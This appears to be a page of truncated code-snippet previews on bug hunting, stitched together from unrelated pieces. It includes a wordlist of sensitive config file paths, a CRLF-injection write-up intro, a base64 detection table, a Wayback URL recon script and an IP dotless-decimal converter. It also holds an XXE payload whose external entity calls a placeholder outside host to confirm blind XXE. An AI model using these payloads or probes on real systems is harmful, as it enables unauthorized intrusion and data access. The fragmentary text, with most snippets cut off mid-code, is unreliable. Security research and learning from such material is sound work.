| /.s3cfg | |
| /phpunit.xml | |
| /nginx.conf | |
| /.vimrc | |
| /LICENSE.md | |
| /yarn.lock | |
| /Gulpfile | |
| /Gulpfile.js | |
| /composer.json | |
| /.npmignore |
I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.
If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.
| # 0 is too far from ` ;) | |
| set -g base-index 1 | |
| # Automatically set window title | |
| set-window-option -g automatic-rename on | |
| set-option -g set-titles on | |
| #set -g default-terminal screen-256color | |
| set -g status-keys vi | |
| set -g history-limit 10000 |
MITRE ATT4CK - T1132 - Data Encoding
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
JAB |
🗣 Jabber | $. |
Variable declaration (UTF-16) |
TVq |
📺 Television | MZ |
MZ header |
UEs |
🏬 Upper East Side | PK |
ZIP, Office documents |
SUVY |
🚙 SUV | IEX |
PowerShell Invoke Expression |
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
| import sys | |
| def to_octets(ip): | |
| return [int(i) for i in ip.split('.')] | |
| def dotless_decimal(ip): | |
| octets = to_octets(ip) | |
| result = octets[0] * 16777216 + octets[1] * \ |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
